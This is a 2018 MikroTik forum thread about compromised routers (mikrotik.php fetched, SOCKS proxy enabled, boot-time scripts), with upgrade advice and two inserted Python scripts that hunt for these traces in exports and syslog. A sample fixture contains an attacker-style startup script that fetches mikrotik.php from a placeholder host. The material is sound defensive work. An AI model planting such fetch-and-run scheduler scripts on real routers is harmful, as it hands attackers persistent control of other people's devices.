sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Router compromised

Tue Jul 24, 2018 4:27 am

I found my RB750 crashing due to running out of RAM this evening. Upon deeper investigation, it appeared that unauthorised access had been obtained to the router. Some firewall "drop" rules were disabled and there was a "mikrotik.php" file along with some scripts running.

I found the php file rather quickly although it took a little longer to locate the scripts.

I have upgraded from 6.38.1 to 6.42.6 (I understand there were some patched vulnerabilities) and have changed user passwords. I initially changed these after removing the file/scripts but found there was still a job running after the firmware upgrade. I subsequently changed user passwords again and have not seen it re-appear since.

Other than ensuring I lock down access to any admin interfaces from remote networks (these were a little more open than they should have been), is there anything else I can look for to ensure that I have cleared all traces of this malicious activity?
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
infused
Member
Posts: 305
Joined: Fri Dec 28, 2012 2:33 pm

Re: Router compromised

Tue Jul 24, 2018 4:32 am

Had the same issue today. Half our customers were compromised.
Last edited by infused on Tue Jul 24, 2018 4:51 am, edited 1 time in total.
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 4:37 am

Ouch. Well "at least" it's not just me. I've spent 3 hours on it and it seems to have subsided - for now, at least.

Router has now been up 1h6m and the best it has otherwise managed in the past 3.5 hours was 15 mins.
 
vecernik87
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: Router compromised

Tue Jul 24, 2018 5:10 am

infused wrote:
This is *not* fixed in the latest release. This is a new bug.

I am aware you removed this sentence. I just want to make sure: was it a completely incorrect claim (i.e. a new attack using an old and fixed vulnerability), or is there even slight info suggesting there might be another NEW vulnerability?

@sjoram: thanks for the info! This might actually bring some light into another similar case.
 
infused
Member
Posts: 305
Joined: Fri Dec 28, 2012 2:33 pm

Re: Router compromised

Tue Jul 24, 2018 7:09 am

vecernik87 wrote:
infused wrote:
This is *not* fixed in the latest release. This is a new bug.

I am aware you removed this sentence. I just want to make sure: was it a completely incorrect claim (i.e. a new attack using an old and fixed vulnerability), or is there even slight info suggesting there might be another NEW vulnerability?

@sjoram: thanks for the info! This might actually bring some light into another similar case.

Well I thought it was, now I'm not so sure, but I cannot get any clarification.

We had routers on most firmware versions affected. But if it is a compromised user list which has been used over previous months to attempt to log in via winbox, then this would explain it.

So many devices were hacked though I really don't know.

Both cases look identical.
 
AlekseyMansurov
just joined
Posts: 2
Joined: Tue Jul 24, 2018 7:13 am
Location: Russia, Yekaterinburg

Re: Router compromised

Tue Jul 24, 2018 7:17 am

Hello.
My RouterBOARD has been hacked two days in a row; every time I roll back, and now I have turned off all services except winbox and firewalled it (access only from a src. address list). Will wait.
The first time I thought that my password had been hacked or keylogged, but now I see that a lot of customers are affected.
 
AlekseyMansurov
just joined
Posts: 2
Joined: Tue Jul 24, 2018 7:13 am
Location: Russia, Yekaterinburg

Re: Router compromised

Tue Jul 24, 2018 8:19 am

It seems this case is the vulnerability solved in the 6.42.1 update. I used 6.41.2 and my router got hacked; after reading that topic I updated (now): viewtopic.php?f=2&t=137147
 
bfka
just joined
Posts: 1
Joined: Tue Jul 24, 2018 9:10 am

Re: Router compromised

Tue Jul 24, 2018 9:16 am

There was a breach earlier (maybe a month ago or so) and I changed the name of the admin account and disabled it, created another user with full access, upgraded the firmware (both) and... the new username was used to access two of my routers. The IP address of the mikrotik.php script (empty) was 95.154.216.164
 
inteq
Member Candidate
Posts: 101
Joined: Wed Feb 25, 2015 8:15 pm

Re: Router compromised

Tue Jul 24, 2018 10:05 am

Got at least one MT hacked as well, from 95.154.216.151, with mikrotik.php (empty, it seems) uploaded.
 
vecernik87
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: Router compromised

Tue Jul 24, 2018 10:57 am

The "mikrotik.php" is actually not an uploaded file. It is downloaded using "fetch" but not deleted. Be glad that those hackers make this silly mistake again and again, so we can easily notice that something is wrong.
The fetch probably has two purposes. Firstly, it gives the remote server notification that the device is hacked and ready to receive commands, and secondly, if the fetched file contains some commands, they may be executed (so the attacker actually does not need any remote access, any extra username or changed password, which would show that the device is hacked).
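Added example, not code from this thread or from MikroTik: a small Python hunt over the text of a RouterOS /export, looking for the artefacts the posts above describe, i.e. disabled drop rules, an enabled SOCKS proxy, scripts whose source calls /tool fetch, scheduler entries (especially start-time=startup) and management services left enabled. The export text below is a constructed sample; the section names, key names and the trailing-backslash line continuation follow the /export format as I know it, but treat them as assumptions to check against your own export, and treat a hit as something to review by hand, not proof of compromise.

```python
import shlex

# Constructed fragment shaped like a RouterOS "/export". Made up for this example,
# not taken from any router in the thread. Section headers start with "/", entries
# are "add"/"set" lines, and long lines continue with a trailing backslash.
SAMPLE_EXPORT = r"""
# constructed sample export, not from a real router
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=input comment="defconf: drop all not coming from LAN" disabled=yes in-interface=!bridge
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" \
    connection-nat-state=!dstnat connection-state=new in-interface=ether1
/ip socks
set enabled=yes port=4145
/system script
add name=script1 owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive \
    source="/tool fetch address=203.0.113.5 src-path=/mikrotik.php mode=http"
/system scheduler
add interval=0s name=schedule1 on-event=script1 start-time=startup
/ip service
set telnet disabled=no
"""


def parse_export(text):
    """Return a list of (section, verb, positional_args, {key: value}) entries."""
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):            # continuation: glue onto the next line
            buf += line[:-1] + " "
            continue
        line, buf = (buf + line).strip(), ""
        if line.startswith("/"):           # menu path, e.g. "/system script"
            section = line
            continue
        tokens = shlex.split(line)         # honours quoted values such as source="..."
        verb, args = tokens[0], tokens[1:]
        positional = [t for t in args if "=" not in t]
        kv = dict(t.split("=", 1) for t in args if "=" in t)
        entries.append((section, verb, positional, kv))
    return entries


def hunt(entries):
    """Flag the things the thread reports the intruder leaving behind."""
    findings = []
    for section, verb, positional, kv in entries:
        if section == "/ip firewall filter" and kv.get("action") == "drop" and kv.get("disabled") == "yes":
            findings.append(f"disabled drop rule in chain {kv.get('chain', '?')}: {kv.get('comment', '')}")
        elif section == "/ip socks" and kv.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {kv.get('port', '1080')}")
        elif section == "/system script":
            # every script is listed on purpose: the attacker planted one, so review them all
            tag = " (calls /tool fetch)" if "/tool fetch" in kv.get("source", "") else ""
            findings.append(f"script {kv.get('name', '?')} present{tag}")
        elif section == "/system scheduler":
            findings.append(f"scheduler {kv.get('name', '?')} runs '{kv.get('on-event', '')}' "
                            f"at start-time={kv.get('start-time', '')}")
        elif section == "/ip service" and verb == "set" and positional and kv.get("disabled") == "no":
            findings.append(f"service {positional[0]} enabled")
    return findings


if __name__ == "__main__":
    for f in hunt(parse_export(SAMPLE_EXPORT)):
        print(f)
```

Feed it the saved output of `/export` (or `/export verbose`, which also prints values still at their defaults). Legitimate scripts and schedulers of your own will show up too; the point is to have a short list to eyeball rather than to scroll a whole export.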
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 10:59 am

Fortunately, I have the logs from my device being captured via syslog.

I am just trawling through these (1700 so far) and appear to have found the first sign from last night, when I noticed problems. This shows a SUCCESSFUL winbox login, followed by SOCKS config changes and scripts being added/removed.

However I can see entries in the logs from much earlier showing mikrotik.php being downloaded repeatedly.

I can find traces back as far as the 21st relating to successful winbox logins, also showing SOCKS/script changes that were not made during a genuine admin session.

I'm at 4550 syslog entries so far but will keep checking back for more.

I note that a possible exploit was to gain root access via telnet and load a script into flash to run on every boot. I observed after the firmware update/password change that a "job" was still running under scripts, but no script itself was showing, as was the case prior to firmware upgrade. I've not rebooted again since to see if this behaviour returns on next boot, but need to check this as I'm concerned the device may still be compromised. Any ideas?
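Added example, not from the post above: Python triage over syslog lines of the kind sjoram describes. It rebuilds admin sessions from login/logout events, attributes changes to socks/script/scheduler/user objects to whatever session was open under that username, and flags logins from outside an allowed management range plus any mention of mikrotik.php. The log lines are constructed for this example in the shape of RouterOS account/system messages as a syslog server receives them; the exact wording your RouterOS version logs may differ, so the regexes are an assumption to adjust against your own logs.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample shaped like RouterOS lines as received by a syslog server
# ("<timestamp> <host> <topics> <message>"). Made up for this example; the
# addresses are documentation/private ranges, not the ones reported in the thread.
SAMPLE_LOG = """\
Jul 20 23:11:40 gw system,info fetch: mikrotik.php downloaded from 203.0.113.5
Jul 21 02:14:03 gw system,info,account user admin logged in from 203.0.113.5 via winbox
Jul 21 02:14:05 gw system,info socks changed by admin
Jul 21 02:14:06 gw system,info script added by admin
Jul 21 02:14:07 gw system,info scheduler added by admin
Jul 21 02:14:09 gw system,info,account user admin logged out from 203.0.113.5 via winbox
Jul 22 09:00:00 gw system,info,account user admin logged in from 192.168.88.10 via winbox
Jul 22 09:01:30 gw system,info filter rule changed by admin
Jul 22 09:03:12 gw system,info,account user admin logged out from 192.168.88.10 via winbox
Jul 23 04:40:00 gw system,info,account user admin logged in from 203.0.113.5 via telnet
Jul 23 04:40:04 gw system,info,account user admin logged out from 203.0.113.5 via telnet
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<topics>\S+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"user (?P<user>\S+) logged (?P<dir>in|out) from (?P<ip>\S+) via (?P<svc>\S+)")
CHANGE_RE = re.compile(r"^(?P<obj>.+?) (?P<verb>added|removed|changed) by (?P<user>\S+)$")

# Objects the thread reports the intruder touching: SOCKS proxy, scripts, scheduler, users.
SENSITIVE = {"socks", "script", "scheduler", "user"}


@dataclass
class Session:
    user: str
    ip: str
    service: str
    start: str
    trusted: bool
    end: str = ""
    changes: list = field(default_factory=list)


def triage(log_text, admin_networks):
    """Rebuild admin sessions from the log; return (sessions, findings)."""
    nets = [ipaddress.ip_network(n) for n in admin_networks]
    open_sessions = {}                      # (user, ip) -> Session still logged in
    sessions, findings = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, topics, msg = m["ts"], m["topics"].split(","), m["msg"]
        if "account" in topics:             # login / logout events
            lm = LOGIN_RE.search(msg)
            if not lm:
                continue
            key = (lm["user"], lm["ip"])
            if lm["dir"] == "in":
                trusted = any(ipaddress.ip_address(lm["ip"]) in n for n in nets)
                s = Session(lm["user"], lm["ip"], lm["svc"], ts, trusted)
                open_sessions[key] = s
                sessions.append(s)
                if not trusted:
                    findings.append(f"{ts} login by {lm['user']} from untrusted {lm['ip']} via {lm['svc']}")
            else:
                s = open_sessions.pop(key, None)
                if s:
                    s.end = ts
            continue
        cm = CHANGE_RE.match(msg)           # "<object> added|removed|changed by <user>"
        if cm:
            obj, verb, who = cm["obj"], cm["verb"], cm["user"]
            flagged = obj.split()[0] in SENSITIVE
            for s in open_sessions.values():
                if s.user == who:           # attribute to the open session(s) under that name
                    s.changes.append((ts, obj, verb))
                    flagged = flagged or not s.trusted
            if flagged:
                findings.append(f"{ts} {obj} {verb} by {who}")
            continue
        if "mikrotik.php" in msg:
            findings.append(f"{ts} fetch of mikrotik.php seen: {msg}")
    return sessions, findings


if __name__ == "__main__":
    _, found = triage(SAMPLE_LOG, ["192.168.88.0/24"])
    print("\n".join(found))
```

With a real capture you would call `triage(open("router.log").read(), ["192.168.88.0/24"])` (file name and management range are placeholders); a change to a non-sensitive object, such as a filter rule edited from a trusted address, is recorded on the session but not reported, while the same edit from an untrusted address is.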
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 11:00 am

Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?
 
normis
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised

Tue Jul 24, 2018 11:02 am

By default, the internet port is protected and doesn't allow any type of access. If you do not trust your LAN, you should make your own rules, that is true.
No answer to your question? How to write posts
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 11:14 am

bfka wrote:
There was a breach earlier (maybe a month ago or so) and I changed the name of the admin account and disabled it, created another user with full access, upgraded the firmware (both) and... the new username was used to access two of my routers. The IP address of the mikrotik.php script (empty) was 95.154.216.164

Did you change your user/password AFTER the firmware upgrade? I also changed *before*, but clearly those were also being compromised. So far, since changing *after* the upgrade, I've seen no further successful attempts.
 
pe1chl
Forum Guru
Posts: 5545
Joined: Mon Jun 08, 2015 12:09 pm

Re: Router compromised

Tue Jul 24, 2018 11:42 am

sjoram wrote:
Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?

When you are concerned about security, why did you not upgrade RouterOS for so long, and not even after vulnerabilities had been found and patched?
There really is no excuse for running 6.38.1 on a visible device...
But indeed, as Normis also writes, you should not expose the admin interface to the internet, and also not to your local network when you have thousands of subscribers there.
The default firewall protects from internet-side access, but in your case it could be a good idea to reset to defaults and reconfigure, as the default firewall has improved but a firmware upgrade does not install the new default settings; it just keeps your existing settings, which were generated from an old default.
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 12:45 pm

pe1chl wrote:
sjoram wrote:
Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?

When you are concerned about security, why did you not upgrade RouterOS for so long, and not even after vulnerabilities had been found and patched?
There really is no excuse for running 6.38.1 on a visible device...
But indeed, as Normis also writes, you should not expose the admin interface to the internet, and also not to your local network when you have thousands of subscribers there.
The default firewall protects from internet-side access, but in your case it could be a good idea to reset to defaults and reconfigure, as the default firewall has improved but a firmware upgrade does not install the new default settings; it just keeps your existing settings, which were generated from an old default.

You make a fair point regarding not upgrading. I notice there is an RSS link on the download page on the web; it would be useful if there were some other method (email?) of notification when there are new releases/changelogs.

This is on a home network so there are not "thousands" of subscribers on my LAN side, though I understand there may be for others.

It would appear that some of the default drop rules have been negated due to misconfiguration, which I will get fixed.

There have been a few other issues of functionality I've had of late with ROS, so I'm looking to spin up and explore an instance of an alternative platform.
 
yottabit
Member Candidate
Posts: 160
Joined: Thu Feb 21, 2013 5:56 am

Re: Router compromised

Tue Jul 24, 2018 3:11 pm

You can sign up for email notifications from Mikrotik. I also follow Mikrotik's Twitter account and a non-Mikrotik Twitter account for release notices.

There's a subscription field at the bottom of the downloads page: https://mikrotik.com/download

Twitters: @mikrotik_com, @mikrotik_build

 
normis
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised

Tue Jul 24, 2018 3:12 pm

https://blog.mikrotik.com now will have security announcements, it also has RSS feed for the specific "security" category.
 
genesispro
Member Candidate
Posts: 126
Joined: Fri Mar 14, 2014 12:33 pm

Re: Router compromised

Wed Jul 25, 2018 10:01 pm

I also got it, and the telnet, ssh and www services were disabled, even on version 6.41.3.
Which version is affected and how is it injected?
 
sjoram
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Wed Jul 25, 2018 10:12 pm

I believe mine may have been this:
http://www.networkinghowtos.com/howto/m ... x-service/

I have seen another post (which I will not reproduce here) detailing the exact steps required to perform the exploit. This leads me to believe my device may still be compromised as the attacker would have gained root access to the operating system and injected some code to run at every boot. I have killed the script set in scheduler to run on every boot, however my device has not been rebooted since the firmware upgrade.

I have a backup and I am planning to run a netinstall to format the flash and reinstall ROS as soon as I can get physical access to the device, probably at the weekend.
 
darkmanlv
just joined
Posts: 24
Joined: Thu Mar 26, 2015 3:19 pm
Location: Riga, Latvia

Re: Router compromised

Wed Jul 25, 2018 11:27 pm

Found the same today; the version was 6.39 and it also added this script with 95.154.216.164. Changed the password, updated RouterBOARD firmware and RouterOS :)
 
normis
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised  [SOLVED]

Thu Jul 26, 2018 7:58 am

sjoram wrote:
I believe mine may have been this:
http://www.networkinghowtos.com/howto/m ... x-service/

Like I said, this was fixed in April. We are not joking when we suggest keeping your router up to date. And change the passwords once in a while, after upgrading.

Full details https://blog.mikrotik.com